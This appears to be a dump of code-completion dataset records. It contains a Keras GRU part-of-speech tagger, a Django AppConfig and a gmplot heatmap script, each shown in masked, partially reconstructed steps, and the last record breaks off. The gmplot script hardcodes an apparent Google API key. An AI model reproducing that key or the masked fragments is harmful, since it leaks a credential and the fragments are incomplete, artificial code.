#model.add(L.Conv1D(32,3,padding='same',activation='tanh'))
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
#
#
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.Conv1D(128,2,padding='same',activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128,3,padding='same',activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128,4,padding='same',activation='tanh'))
model.add(L.TimeDistributed(L.Dense(256,activation='tanh')))
model.add(L.Dropout(0.25))
#model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
#model.add(L.Dropout(0.25))
stepwise_dense = L.Dense(len(all_tags),activation='softmax')
stepwise_dense = L.TimeDistributed(stepwise_dense)
model.add(stepwise_dense)
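# The TimeDistributed softmax yields per-token tag probabilities of shape [batch, time, n_tags].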
model.summary()
model.compile('adam','categorical_crossentropy')
model.fit_generator(generate_batches(train_data),len(train_data)/BATCH_SIZE,
callbacks=[EvaluateAccuracy()], epochs=50,)
acc = compute_test_accuracy(model)
print("\nFinal accuracy: %.5f"%acc)
model.save_weights("LSTM_gpu_trained_weights_1layer.h5")
|
normal
|
{
"blob_id": "7f7ebc6d3d69fbb19071c63a9ab235ad01f1d414",
"index": 306,
"step-1": "<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\n<mask token>\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('..')\n<mask token>\nhelpers.mask_busy_gpus(wait=False)\n<mask token>\nnltk.download('brown')\nnltk.download('universal_tagset')\n<mask token>\nfor sentence in data:\n words, tags = zip(*sentence)\n word_counts.update(words)\n<mask token>\nprint('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /\n sum(word_counts.values())))\n<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\nprint('Word ids:')\nprint(to_matrix(batch_words, word_to_id))\nprint('Tag ids:')\nprint(to_matrix(batch_tags, tag_to_id))\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\nmodel.add(L.InputLayer([None], dtype='int32'))\nmodel.add(L.Embedding(len(all_words), 50))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, 
return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.Conv1D(128, 2, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 3, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 4, padding='same', activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256, activation='tanh')))\nmodel.add(L.Dropout(0.25))\n<mask token>\nmodel.add(stepwise_dense)\nmodel.summary()\nmodel.compile('adam', 'categorical_crossentropy')\nmodel.fit_generator(generate_batches(train_data), len(train_data) /\n BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)\n<mask token>\nprint(\"\"\"\nFinal accuracy: %.5f\"\"\" % acc)\nmodel.save_weights('LSTM_gpu_trained_weights_1layer.h5')\n",
"step-4": "<mask token>\nsys.path.append('..')\n<mask token>\nhelpers.mask_busy_gpus(wait=False)\n<mask token>\nnltk.download('brown')\nnltk.download('universal_tagset')\ndata = nltk.corpus.brown.tagged_sents(tagset='universal')\nall_tags = ['#EOS#', '#UNK#', 'ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.',\n 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']\ndata = np.array([[(word.lower(), tag) for word, tag in sentence] for\n sentence in data])\n<mask token>\ntrain_data, test_data = train_test_split(data, test_size=0.25, random_state=42)\n<mask token>\nword_counts = Counter()\nfor sentence in data:\n words, tags = zip(*sentence)\n word_counts.update(words)\nall_words = ['#EOS#', '#UNK#'] + list(list(zip(*word_counts.most_common(\n 10000)))[0])\nprint('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /\n sum(word_counts.values())))\n<mask token>\nword_to_id = defaultdict(lambda : 1, {word: i for i, word in enumerate(\n all_words)})\ntag_to_id = {tag: i for i, tag in enumerate(all_tags)}\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\nbatch_words, batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])\nprint('Word ids:')\nprint(to_matrix(batch_words, word_to_id))\nprint('Tag ids:')\nprint(to_matrix(batch_tags, tag_to_id))\n<mask token>\nBATCH_SIZE = 32\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\nmodel = keras.models.Sequential()\nmodel = keras.models.Sequential()\nmodel.add(L.InputLayer([None], dtype='int32'))\nmodel.add(L.Embedding(len(all_words), 50))\nmodel.add(L.TimeDistributed(L.Dense(96, 
activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.Conv1D(128, 2, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 3, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 4, padding='same', activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nstepwise_dense = L.Dense(len(all_tags), activation='softmax')\nstepwise_dense = L.TimeDistributed(stepwise_dense)\nmodel.add(stepwise_dense)\nmodel.summary()\nmodel.compile('adam', 'categorical_crossentropy')\nmodel.fit_generator(generate_batches(train_data), len(train_data) /\n BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)\nacc = compute_test_accuracy(model)\nprint(\"\"\"\nFinal accuracy: %.5f\"\"\" % acc)\nmodel.save_weights('LSTM_gpu_trained_weights_1layer.h5')\n",
"step-5": "import sys\nsys.path.append(\"..\")\nimport helpers\nhelpers.mask_busy_gpus(wait=False)\n\n\n\nimport nltk\n\nimport numpy as np\nnltk.download('brown')\nnltk.download('universal_tagset')\ndata = nltk.corpus.brown.tagged_sents(tagset='universal')\nall_tags = ['#EOS#','#UNK#','ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.', 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']\n\ndata = np.array([ [(word.lower(),tag) for word,tag in sentence] for sentence in data ])\n\nfrom sklearn.cross_validation import train_test_split\ntrain_data,test_data = train_test_split(data,test_size=0.25,random_state=42)\n\nfrom collections import Counter\nword_counts = Counter()\nfor sentence in data:\n words,tags = zip(*sentence)\n \n word_counts.update(words)\n\nall_words = ['#EOS#','#UNK#']+list(list(zip(*word_counts.most_common(10000)))[0])\n#print(all_words)\n#let's measure what fraction of data words are in the dictionary\nprint(\"Coverage = %.5f\"%(float(sum(word_counts[w] for w in all_words)) / sum(word_counts.values())))\n\nfrom collections import defaultdict\nword_to_id = defaultdict(lambda:1,{word:i for i,word in enumerate(all_words)})\ntag_to_id = {tag:i for i,tag in enumerate(all_tags)}\n\ndef to_matrix(lines,token_to_id,max_len=None,pad=0,dtype='int32',time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n \n max_len = max_len or max(map(len,lines))\n matrix = np.empty([len(lines),max_len],dtype)\n matrix.fill(pad)\n\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__,lines[i]))[:max_len]\n matrix[i,:len(line_ix)] = line_ix\n\n return matrix.T if time_major else matrix\n\nbatch_words,batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])\n\nprint(\"Word ids:\")\nprint(to_matrix(batch_words,word_to_id))\nprint(\"Tag ids:\")\nprint(to_matrix(batch_tags,tag_to_id))\n\nimport keras\nimport keras.layers as L\n\nfrom keras.utils.np_utils import to_categorical\nBATCH_SIZE=32\ndef generate_batches(sentences,batch_size=BATCH_SIZE,max_len=None,pad=0):\n assert isinstance(sentences,np.ndarray),\"Make sure sentences is q numpy array\"\n \n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0,len(indices)-1,batch_size):\n batch_indices = indices[start:start+batch_size]\n batch_words,batch_tags = [],[]\n for sent in sentences[batch_indices]:\n words,tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n\n batch_words = to_matrix(batch_words,word_to_id,max_len,pad)\n batch_tags = to_matrix(batch_tags,tag_to_id,max_len,pad)\n\n batch_tags_1hot = to_categorical(batch_tags,len(all_tags)).reshape(batch_tags.shape+(-1,))\n yield batch_words,batch_tags_1hot\n \ndef compute_test_accuracy(model):\n test_words,test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words,test_tags = to_matrix(test_words,word_to_id),to_matrix(test_tags,tag_to_id)\n\n #predict tag probabilities of shape [batch,time,n_tags]\n predicted_tag_probabilities = model.predict(test_words,verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n\n #compute accurary excluding padding\n numerator = np.sum(np.logical_and((predicted_tags == test_tags),(test_words != 0)))\n denominator = np.sum(test_words != 0)\n return float(numerator)/denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n def on_epoch_end(self,epoch,logs=None):\n sys.stdout.flush()\n print(\"\\nMeasuring validation accuracy...\")\n acc = compute_test_accuracy(self.model)\n print(\"\\nValidation 
accuracy: %.5f\\n\"%acc)\n sys.stdout.flush()\n\n\nmodel = keras.models.Sequential()\n\nmodel = keras.models.Sequential()\nmodel.add(L.InputLayer([None],dtype='int32'))\nmodel.add(L.Embedding(len(all_words),50))\nmodel.add(L.TimeDistributed(L.Dense(96,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#model.add(L.Conv1D(32,3,padding='same',activation='tanh'))\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\n\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#\n\n#\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\n\nmodel.add(L.Conv1D(128,2,padding='same',activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128,3,padding='same',activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128,4,padding='same',activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\n#model.add(L.Dropout(0.25))\n\nstepwise_dense = L.Dense(len(all_tags),activation='softmax')\nstepwise_dense = L.TimeDistributed(stepwise_dense)\nmodel.add(stepwise_dense)\n\nmodel.summary()\nmodel.compile('adam','categorical_crossentropy')\n\nmodel.fit_generator(generate_batches(train_data),len(train_data)/BATCH_SIZE,\n callbacks=[EvaluateAccuracy()], epochs=50,)\n\n\nacc = compute_test_accuracy(model)\nprint(\"\\nFinal accuracy: %.5f\"%acc)\n\nmodel.save_weights(\"LSTM_gpu_trained_weights_1layer.h5\")\n",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
from django.apps import AppConfig
class PyrpgConfig(AppConfig):
name = 'PyRPG'
|
normal
|
{
"blob_id": "f8bf7e2d8f06bbd00f04047153833c07bf483fd3",
"index": 259,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass PyrpgConfig(AppConfig):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass PyrpgConfig(AppConfig):\n name = 'PyRPG'\n",
"step-4": "from django.apps import AppConfig\n\n\nclass PyrpgConfig(AppConfig):\n name = 'PyRPG'\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# import gmplot package
import gmplot
import numpy as np
# generate 700 random lats and lons
latitude = (np.random.random_sample(size = 700) - 0.5) * 180
longitude = (np.random.random_sample(size = 700) - 0.5) * 360
# declare the center of the map, and how much we want the map zoomed in
gmap = gmplot.GoogleMapPlotter(0, 0, 2)
# plot heatmap
gmap.heatmap(latitude, longitude)
gmap.scatter(latitude, longitude, c='r', marker=True)
#Your Google_API_Key
gmap.apikey = "AIzaSyAid6Kk6DZVnu0VNsrDJsmhKwH1pqyiu00"
# save it to html
gmap.draw("c:\\users\\jackc\desktop\\country_heatmap.html")
'''
import csv
import pandas as pd
from operator import itemgetter
import matplotlib.pyplot as plt
import numpy as np
import mplcursors
import gmplot
def outputScatter():
data = pd.read_csv('C:\\Users\\jackc\\Desktop\\ctran\dataMerge.csv')
df = data.groupby('location_id')
gmap = gmplot.GoogleMapPlotter(0,0,2)
counter = 0
result = []
result_lon = []
result_lat = []
result_calculation = []
result_lon_static = []
result_lat_static = []
result_toSCV = []
above50ft = 0
above70ft = 0
above90ft = 0
above150ft = 0
index = 0
colors = ['r','y','g','b']
for x,y in df:
for z in range(y.location_distance.values.size):
result_lon_static.append(y.y_coordinate.values[z])
result_lat_static.append(y.x_coordinate.values[z])
if(y.location_distance.values[z] > 30):
counter = counter + 1
if(y.location_distance.values[z] > 50):
above50ft = above50ft + 1
if(y.location_distance.values[z] > 70):
above70ft = above70ft + 1
if(y.location_distance.values[z] > 90):
above90ft = above90ft + 1
if(y.location_distance.values[z] > 150):
above150ft = above150ft + 1
cal=counter/(y.location_distance.values.size)
result.append([y.stop_code.values[0], cal, y.stop_lat.values[0], y.stop_lon.values[0]])
result_lat.append(y.stop_lat.values[0])
result_lon.append(y.stop_lon.values[0])
result_calculation.append(cal)
result_toSCV.append([y.stop_code.values[0], cal, y.location_distance.values.size, counter, above50ft, above70ft, above90ft, above150ft])
index = index+1
above50ft = 0
above70ft = 0
above90ft = 0
above150ft = 0
counter = 0
result = sorted(result,key=itemgetter(1), reverse=True)
result_toSCV = sorted(result_toSCV, key=itemgetter(1), reverse=True)
plt.scatter(result_lat_static,result_lon_static, c='black')
code_id = []
for x in result:
#code_id.append(x[0])
#result_calculation.append(x[1])
#result_lat.append(x[2])
#result_lon.append(x[3])
if x[1] > 0.9:
red = plt.scatter(x[3],x[2], c=colors[0], label='>90%')
#red = plt.scatter(x[3],x[2], c=colors[0], label=x[0])
elif x[1] > 0.8:
yellow = plt.scatter(x[3],x[2], c=colors[1], label='>80%')
#yellow = plt.scatter(x[3],x[2], c=colors[1], label=x[0])
elif x[1] > 0.7:
green = plt.scatter(x[3],x[2], c=colors[2], label='>70%')
#green = plt.scatter(x[3],x[2], c=colors[2], label=x[0])
else:
blue = plt.scatter(x[3],x[2], c=colors[3], label='>60%')
#blue = plt.scatter(x[3],x[2], c=colors[3], label=x[0])
with open('C:\\Users\\Jackc\\Desktop\\Ctran\\outputPercentError.csv', mode='w', newline='') as file:
writer = csv.writer(file)
writer.writerow(['location_id', 'percent_Error', 'total_count', 'above30ft', 'above50ft', 'above70ft', 'above90ft', 'above150ft'])
for x in result_toSCV:
writer.writerow(x)
'''
|
normal
|
{
"blob_id": "1cc77ed1c5da025d1b539df202bbd3310a174eac",
"index": 3902,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ngmap.heatmap(latitude, longitude)\ngmap.scatter(latitude, longitude, c='r', marker=True)\n<mask token>\ngmap.draw('c:\\\\users\\\\jackc\\\\desktop\\\\country_heatmap.html')\n<mask token>\n",
"step-3": "<mask token>\nlatitude = (np.random.random_sample(size=700) - 0.5) * 180\nlongitude = (np.random.random_sample(size=700) - 0.5) * 360\ngmap = gmplot.GoogleMapPlotter(0, 0, 2)\ngmap.heatmap(latitude, longitude)\ngmap.scatter(latitude, longitude, c='r', marker=True)\ngmap.apikey = 'AIzaSyAid6Kk6DZVnu0VNsrDJsmhKwH1pqyiu00'\ngmap.draw('c:\\\\users\\\\jackc\\\\desktop\\\\country_heatmap.html')\n<mask token>\n",
"step-4": "import gmplot\nimport numpy as np\nlatitude = (np.random.random_sample(size=700) - 0.5) * 180\nlongitude = (np.random.random_sample(size=700) - 0.5) * 360\ngmap = gmplot.GoogleMapPlotter(0, 0, 2)\ngmap.heatmap(latitude, longitude)\ngmap.scatter(latitude, longitude, c='r', marker=True)\ngmap.apikey = 'AIzaSyAid6Kk6DZVnu0VNsrDJsmhKwH1pqyiu00'\ngmap.draw('c:\\\\users\\\\jackc\\\\desktop\\\\country_heatmap.html')\n<mask token>\n",
"step-5": "# import gmplot package\nimport gmplot\nimport numpy as np\n# generate 700 random lats and lons\nlatitude = (np.random.random_sample(size = 700) - 0.5) * 180\nlongitude = (np.random.random_sample(size = 700) - 0.5) * 360\n# declare the center of the map, and how much we want the map zoomed in\ngmap = gmplot.GoogleMapPlotter(0, 0, 2)\n# plot heatmap\ngmap.heatmap(latitude, longitude)\ngmap.scatter(latitude, longitude, c='r', marker=True)\n#Your Google_API_Key\ngmap.apikey = \"AIzaSyAid6Kk6DZVnu0VNsrDJsmhKwH1pqyiu00\"\n# save it to html\ngmap.draw(\"c:\\\\users\\\\jackc\\desktop\\\\country_heatmap.html\")\n\n'''\nimport csv\nimport pandas as pd\nfrom operator import itemgetter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport mplcursors\nimport gmplot\n\ndef outputScatter():\n data = pd.read_csv('C:\\\\Users\\\\jackc\\\\Desktop\\\\ctran\\dataMerge.csv')\n df = data.groupby('location_id')\n\tgmap = gmplot.GoogleMapPlotter(0,0,2)\n counter = 0\n result = []\n result_lon = []\n result_lat = []\n result_calculation = []\n result_lon_static = []\n result_lat_static = []\n result_toSCV = []\n above50ft = 0\n above70ft = 0\n above90ft = 0\n above150ft = 0\n index = 0\n colors = ['r','y','g','b']\n\n for x,y in df:\n for z in range(y.location_distance.values.size):\n result_lon_static.append(y.y_coordinate.values[z])\n result_lat_static.append(y.x_coordinate.values[z])\n if(y.location_distance.values[z] > 30):\n counter = counter + 1\n if(y.location_distance.values[z] > 50):\n above50ft = above50ft + 1\n if(y.location_distance.values[z] > 70):\n above70ft = above70ft + 1\n if(y.location_distance.values[z] > 90):\n above90ft = above90ft + 1\n if(y.location_distance.values[z] > 150):\n above150ft = above150ft + 1\n\n cal=counter/(y.location_distance.values.size)\n result.append([y.stop_code.values[0], cal, y.stop_lat.values[0], y.stop_lon.values[0]])\n result_lat.append(y.stop_lat.values[0])\n result_lon.append(y.stop_lon.values[0])\n result_calculation.append(cal)\n result_toSCV.append([y.stop_code.values[0], cal, y.location_distance.values.size, counter, above50ft, above70ft, above90ft, above150ft])\n index = index+1\n above50ft = 0\n above70ft = 0\n above90ft = 0\n above150ft = 0\n counter = 0\n result = sorted(result,key=itemgetter(1), reverse=True)\n result_toSCV = sorted(result_toSCV, key=itemgetter(1), reverse=True)\n plt.scatter(result_lat_static,result_lon_static, c='black')\n\n code_id = []\n for x in result:\n #code_id.append(x[0])\n #result_calculation.append(x[1])\n #result_lat.append(x[2])\n #result_lon.append(x[3])\n if x[1] > 0.9:\n red = plt.scatter(x[3],x[2], c=colors[0], label='>90%')\n #red = plt.scatter(x[3],x[2], c=colors[0], label=x[0])\n\n elif x[1] > 0.8:\n yellow = plt.scatter(x[3],x[2], c=colors[1], label='>80%')\n #yellow = plt.scatter(x[3],x[2], c=colors[1], label=x[0])\n elif x[1] > 0.7:\n green = plt.scatter(x[3],x[2], c=colors[2], label='>70%')\n #green = plt.scatter(x[3],x[2], c=colors[2], label=x[0])\n else:\n blue = plt.scatter(x[3],x[2], c=colors[3], label='>60%')\n #blue = plt.scatter(x[3],x[2], c=colors[3], label=x[0])\n\n\n with open('C:\\\\Users\\\\Jackc\\\\Desktop\\\\Ctran\\\\outputPercentError.csv', mode='w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['location_id', 'percent_Error', 'total_count', 'above30ft', 'above50ft', 'above70ft', 'above90ft', 'above150ft'])\n for x in result_toSCV:\n writer.writerow(x)\n\n'''\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
